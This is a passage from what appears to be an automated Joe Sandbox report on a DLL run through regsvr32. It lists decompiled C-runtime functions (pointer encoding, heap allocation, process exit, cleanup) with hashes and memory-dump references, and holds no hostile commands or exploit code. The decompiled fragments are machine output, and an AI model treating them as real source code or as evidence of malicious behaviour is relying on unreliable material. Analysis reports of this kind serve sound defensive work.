                                                      0x7fef75348a1
                                                      0x7fef75348af
                                                      0x7fef75348c7

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.944037719.000007FEF7531000.00000020.00000001.01000000.00000008.sdmp, Offset: 000007FEF7530000, based on PE: true
                                                      • Associated: 00000005.00000002.944013265.000007FEF7530000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000005.00000002.944079382.000007FEF7552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000005.00000002.944087822.000007FEF755B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000005.00000002.944092955.000007FEF755F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7fef7530000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _unlock
                                                      • String ID: Error: memory allocation: bad memory block type.
                                                      • API String ID: 2480363372-1537269110
                                                      • Opcode ID: 0e27953d906dd6213389af50a7459ab3260dce137a7056963e47b3559a26f049
                                                      • Instruction ID: 8d404ee4ec240fb383b5eaa1ec50f73e79e48ed922fc245f8984b595f9268ba7
                                                      • Opcode Fuzzy Hash: 0e27953d906dd6213389af50a7459ab3260dce137a7056963e47b3559a26f049
                                                      • Instruction Fuzzy Hash: 69710B76A2DB8586EBA0CB55E49032AB7E1F388B54F004535EA9D837B4DFBCE044CB00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF7536FF2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.944037719.000007FEF7531000.00000020.00000001.01000000.00000008.sdmp, Offset: 000007FEF7530000, based on PE: true
                                                      • Associated: 00000005.00000002.944013265.000007FEF7530000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000005.00000002.944079382.000007FEF7552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000005.00000002.944087822.000007FEF755B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000005.00000002.944092955.000007FEF755F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7fef7530000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: EncodePointer_initterm_e
                                                      • String ID: Y
                                                      • API String ID: 1618838664-1754117475
                                                      • Opcode ID: 24d3616295d43623420cef2980f0f4d1896d7dbbaf9113ec39dfe7d3f9684184
                                                      • Instruction ID: 8d17ab7a58495d8069f622c6c8970338df7fec2bda78b20ca1d94b3edb2a395b
                                                      • Opcode Fuzzy Hash: 24d3616295d43623420cef2980f0f4d1896d7dbbaf9113ec39dfe7d3f9684184
                                                      • Instruction Fuzzy Hash: 3DE0A561E3C14297E6E5AB20EC803B927E2B794348F400931F94D4A8B5EB3DE905CB00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF7537540 Relevance: 3.0, APIs: 2, Instructions: 17COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 62%
                                                      			E000007FE7FEF7537540(long long __rax) {
				long long _v24;
				void* _t8;
				void* _t9;

				_t16 = __rax;
				_t9 = E000007FE7FEF7533D00(_t8); // executed
				_v24 = __rax;
				return E000007FE7FEF753CF20(E000007FE7FEF753CFB0(E000007FE7FEF753D450(E000007FE7FEF753D470(E000007FE7FEF753BD50(E000007FE7FEF753AB90(_t9, _v24), _v24), _v24), _v24), _v24), _t16, _v24);
			}






                                                      0x7fef7537540
                                                      0x7fef7537544
                                                      0x7fef7537549
                                                      0x7fef753758e

                                                      APIs
                                                        • Part of subcall function 000007FEF7533D00: RtlEncodePointer.NTDLL ref: 000007FEF7533D06
                                                      • _initp_misc_winsig.LIBCMTD ref: 000007FEF753757B
                                                      • _initp_eh_hooks.LIBCMTD ref: 000007FEF7537585
                                                        • Part of subcall function 000007FEF753CF20: EncodePointer.KERNEL32(?,?,?,?,000007FEF753758A,?,?,?,?,?,?,000007FEF7533D39), ref: 000007FEF753CF30
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.944037719.000007FEF7531000.00000020.00000001.01000000.00000008.sdmp, Offset: 000007FEF7530000, based on PE: true
                                                      • Associated: 00000005.00000002.944013265.000007FEF7530000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000005.00000002.944079382.000007FEF7552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000005.00000002.944087822.000007FEF755B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000005.00000002.944092955.000007FEF755F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7fef7530000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: EncodePointer$_initp_eh_hooks_initp_misc_winsig
                                                      • String ID:
                                                      • API String ID: 2678799220-0
                                                      • Opcode ID: abe4bcf42024140c0e82e0fb2c3eff25659a698c9099ae3cd415aa6bcc21eafa
                                                      • Instruction ID: 0c269c0e9c89a172d1ac21a57a99ac11d73c5c65569279fab5c480474d6cc55e
                                                      • Opcode Fuzzy Hash: abe4bcf42024140c0e82e0fb2c3eff25659a698c9099ae3cd415aa6bcc21eafa
                                                      • Instruction Fuzzy Hash: B6E0E967B2C58182E5E0BB51E86226A53B2B7C4788F400575BEDD866BBCE7CE6118A40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF753ACA8 Relevance: 3.0, APIs: 2, Instructions: 15memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.944037719.000007FEF7531000.00000020.00000001.01000000.00000008.sdmp, Offset: 000007FEF7530000, based on PE: true
                                                      • Associated: 00000005.00000002.944013265.000007FEF7530000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000005.00000002.944079382.000007FEF7552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000005.00000002.944087822.000007FEF755B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000005.00000002.944092955.000007FEF755F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7fef7530000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: ExitProcess$AllocateHeap__crt
                                                      • String ID:
                                                      • API String ID: 4215626177-0
                                                      • Opcode ID: 77cc9cc60f8eca6ccffa51c036cc335ce9466cc401fd995fa093edd43c12ab32
                                                      • Instruction ID: a4bd884a76a7b8e783ff02c174b82987dd0b6fd64915a23fb1c4fb0920285d10
                                                      • Opcode Fuzzy Hash: 77cc9cc60f8eca6ccffa51c036cc335ce9466cc401fd995fa093edd43c12ab32
                                                      • Instruction Fuzzy Hash: 99E04F21E2898A82E6E09755E41137A62E2FB88348F400035FA4E027B5CF3DE840D600
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF7534399 Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 58%
                                                      			E000007FE7FEF7534399(long long __rax, long long _a48, intOrPtr _a80, intOrPtr _a88, void* _a120) {

				_a48 = __rax;
				if (_a48 == 0) goto 0xf75343ad;
				goto 0xf75343f5;
				if (_a88 != 0) goto 0xf75343ce;
				if (_a120 == 0) goto 0xf75343c7;
				 *_a120 = 0xc;
				goto 0xf75343f5;
				if (E000007FE7FEF753ABB0(_a48, _a80) != 0) goto 0xf75343f3;
				if (_a120 == 0) goto 0xf75343ef;
				 *_a120 = 0xc;
				goto 0xf75343f5;
				goto 0xf7534377;
				return 0;
			}



                                                      0x7fef7534399
                                                      0x7fef75343a4
                                                      0x7fef75343ab
                                                      0x7fef75343b2
                                                      0x7fef75343ba
                                                      0x7fef75343c1
                                                      0x7fef75343cc
                                                      0x7fef75343da
                                                      0x7fef75343e2
                                                      0x7fef75343e9
                                                      0x7fef75343f1
                                                      0x7fef75343f3
                                                      0x7fef75343f9

                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.944037719.000007FEF7531000.00000020.00000001.01000000.00000008.sdmp, Offset: 000007FEF7530000, based on PE: true
                                                      • Associated: 00000005.00000002.944013265.000007FEF7530000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000005.00000002.944079382.000007FEF7552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000005.00000002.944087822.000007FEF755B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000005.00000002.944092955.000007FEF755F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7fef7530000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1ac0a5da81333129a8f229358abc3f3628bfe7ae3225332448e9bf5308d83ad5
                                                      • Instruction ID: f59c66b49deb2d2b3ece59ad2b01622829c0b8c50141bff4275200efde8df140
                                                      • Opcode Fuzzy Hash: 1ac0a5da81333129a8f229358abc3f3628bfe7ae3225332448e9bf5308d83ad5
                                                      • Instruction Fuzzy Hash: 48018726A2C749C6F6D08A15E44473AA7E1F3847D4F101135FE8D87BB8DB7CE480CA00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF7533433 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _ioterm.LIBCMTD ref: 000007FEF7533437
                                                        • Part of subcall function 000007FEF7537D00: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000007FEF753343C), ref: 000007FEF7537D93
                                                        • Part of subcall function 000007FEF7533E00: FlsFree.KERNEL32 ref: 000007FEF7533E13
                                                        • Part of subcall function 000007FEF7533E00: _mtdeletelocks.LIBCMTD ref: 000007FEF7533E23
                                                        • Part of subcall function 000007FEF75388D0: HeapDestroy.KERNELBASE ref: 000007FEF75388DB
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.944037719.000007FEF7531000.00000020.00000001.01000000.00000008.sdmp, Offset: 000007FEF7530000, based on PE: true
                                                      • Associated: 00000005.00000002.944013265.000007FEF7530000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000005.00000002.944079382.000007FEF7552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000005.00000002.944087822.000007FEF755B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000005.00000002.944092955.000007FEF755F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7fef7530000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: CriticalDeleteDestroyFreeHeapSection_ioterm_mtdeletelocks
                                                      • String ID:
                                                      • API String ID: 1508997487-0
                                                      • Opcode ID: bdb7225874b5496ab185c850c138daf46d614203cfe4a73cb1b8596e23d721ba
                                                      • Instruction ID: 0709412b6044a56b86e050daf6e123306acf1d940542bdba759049c97d51ab2e
                                                      • Opcode Fuzzy Hash: bdb7225874b5496ab185c850c138daf46d614203cfe4a73cb1b8596e23d721ba
                                                      • Instruction Fuzzy Hash: 06E067A1F3C0079AF2D5676498823B91AD39B447C5F810879790EC62F3EA7DB8115661
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%